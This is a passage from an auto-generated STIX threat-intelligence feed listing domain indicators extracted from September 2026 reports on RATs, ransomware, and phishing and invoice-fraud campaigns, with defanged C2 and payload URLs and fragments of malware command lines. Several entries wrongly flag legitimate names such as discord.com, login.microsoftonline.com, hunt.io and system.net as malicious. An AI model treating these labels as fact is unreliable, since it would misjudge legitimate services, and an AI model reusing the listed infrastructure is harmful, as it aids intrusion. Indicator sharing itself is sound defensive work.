News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d6f34b5-d5fd-4352-87f7-51af5386dc12","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: hind is GRAYRABBIT. The backdoor reaches its server at mail.uaiubifas[.]top on port 443, and the traffic there is plain TCP scrambled","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd8a1662-9850-4f49-8e79-7770f6ceec3b","created":"2026-09-11T07:14:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: apimantax.otax.fun","description":"Seen in \"Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files\" (GBHackers). Context: Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and published as","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T07:14:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/mantax-otax-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f664ace1-481e-492c-afaa-dc61d332eba1","created":"2026-09-11T07:11:14.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hunt.io","description":"Seen in \"UK Council Attack Linked to Mass Exploitation of SonicWall Flaw\" (Security Affairs). Context: e automated campaigns was effectively less than three days. Hunt.io’s AttackCapture system crawled the attacker’s open director","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-11T07:11:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/198864/hacking/uk-council-attack-linked-to-mass-exploitation-of-sonicwall-flaw.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--57188f06-a2bc-4e32-abc1-3f3ea5c2da05","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: irectories. Security teams should also hunt for the domains linked4x[.]com , skipraid[.]com , and the observed Azure Blob Storage pa","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4024160-d402-4412-827e-75052a226206","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: the download of CastleLoader and CastleRAT components from skipraid[.]com , using the distinctive K8VGmQTrzX User-Agent string. Cas","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6ebdde39-7ad8-47f7-9176-26d5d819c0b3","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gitclone.org","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: -2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2026","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e4ab313-a97e-45b3-8889-64e8f3489647","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: domainlify.net","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: also registered another domain on the same day. The domain domainlify[.]net was used in the Reply-To email. Figure 7. Account informa","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce12bb3a-5b13-4d54-9d53-3d9309674ba1","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: eemusicclass.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29c1bb67-fd7d-4038-925b-c5dacd563776","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lifeones.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--138687f2-ba3f-4365-ba8e-65549cec8982","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fbac9db9-3523-4353-9ef4-9ebd6d1e05cb","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lumalisboa.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22020c92-3ec6-40c0-b4cc-10cf9c6ed052","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mctci.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e354fc1f-5227-4060-b298-c87f4c859aa0","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: nuf.co.jp","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c304a356-9934-4488-baf1-0ece4b16aa04","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: service-nowinc.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: registered several domains. A ‘ServiceNow’ lookalike domain service-nowinc[.]com was registered on July 31, shortly before the campaign ac","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--742799ec-4511-4b07-927e-8d18c7d3a7a2","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tivityhealth.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76492a42-1c8b-4e71-a49b-df2678dfb2c4","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: tovimbatista.pt","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da6b7992-6d6f-49e4-8894-e0863ee4ecb4","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: uinsure.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fc7a473-20c5-4e73-af51-6164cd835545","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 9342371634011778.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: following command line: \"C:\\Users\\[redacted]\\AppData\\Local\\9342371634011778.com\" -s -L --tlsv1.2 --ssl-no-revoke -o \"C:\\Users\\[redacted]\\Ap","pattern":"[domain-name:value = '9342371634011778.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ada8966f-34cc-4376-aba6-10b2c2ffa035","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hostfxr.dll","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name f3b980dea . The config.py","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd947cba-afad-42e1-adf6-1f1d3463218c","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: linked4x.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: nger.exe to download and execute a batch script from finger.linked4x[.]com as shown in the command line below: \"C:\\windows\\system32\\","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--844a7738-998d-4d4a-8ca9-7698e4eba73e","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: skipraid.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: CastleLoader and CastleRAT components were downloaded from skipraid[.]com using the User-Agent string K8VGmQTrzX . Alongside Castle","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f5106b9-af88-4539-aade-97afae9ca089","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: mory. This script downloaded a SloppyRAT DLL from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--182fb094-bec0-4169-90e2-cdfbb5047887","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: system.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: ieve the number of milliseconds since boot. GetTickCount64 [System.Net.Dns]::GetHostName() / domain — Retrieves the host name or d","pattern":"[domain-name:value = 'system.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b83d02f-7ed3-4185-8ab4-1f8cfacddb4d","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script’s","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c6422fd-65a0-4165-a9ff-ff85d663602f","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 7.tcp.eu","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 67.15[.]169 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File nam","pattern":"[domain-name:value = '7.tcp.eu']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1b823a9-4164-4233-a6a8-11e329dd6c22","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: discord.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 41cf9a0d26 Mercurial Grabber infostealer binary URL https://discord[.]com/api/webhooks/995445114254139543/NmpxQmuBCD6sm3UkVvupGtx-Y","pattern":"[domain-name:value = 'discord.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c85e768-91b2-4e48-8fc8-c81817672fae","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: flow.lavasoft.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: le-analytics.l.google.com 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwa","pattern":"[domain-name:value = 'flow.lavasoft.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de06d4a9-1fec-4adb-bad8-ee555ee55d0a","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mobile-service.segment.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: .com 0.0.0.0 cdn.segment.com 0.0.0.0 api.segment.io 0.0.0.0 mobile-service.segment.com Entries added to the Windows hosts file by DCRAT Domain / I","pattern":"[domain-name:value = 'mobile-service.segment.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3577fd8b-d6ae-4fd9-b49d-7a5189f083a7","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ngrok.io","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 69 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File names / MD5","pattern":"[domain-name:value = 'ngrok.io']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0568331f-c1dc-48da-a3ce-449714b4d27f","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: telemetry.servers.getgo.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwarebytes.com 0.0.0.0 ws.mcafee.com 0.","pattern":"[domain-name:value = 'telemetry.servers.getgo.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4990634-9126-4f95-bb1e-d348c6bf2af9","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xsph.ru","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: he Windows hosts file by DCRAT Domain / IP address a0700877.xsph[.]ru 141.8.197[.]42 DCRAT command-and-control infrastructure F","pattern":"[domain-name:value = 'xsph.ru']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--624d340c-7f34-42d2-90a8-de4baafaac6e","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bloom.io","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description Domain cdn.bloom[.]io External resource host loaded through the Microsoft Teams","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d4fed7c-96e7-4fa4-a3d4-3b45ce4711bb","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: login.microsoftonline.com","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: st loaded through the Microsoft Teams redirect chain Domain login.microsoftonline.com Legitimate Microsoft OAuth endpoint used in the initial red","pattern":"[domain-name:value = 'login.microsoftonline.com']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32e6070b-72a7-40f0-aaa6-ab3d85bb8cae","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: add-passkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: y security Domain setupmypasskey[.]com Passkey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92559246-b264-4a97-a22b-45ed7acf380d","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: integratedsso.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain oktasession[.]com Identity-provider session Do","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security 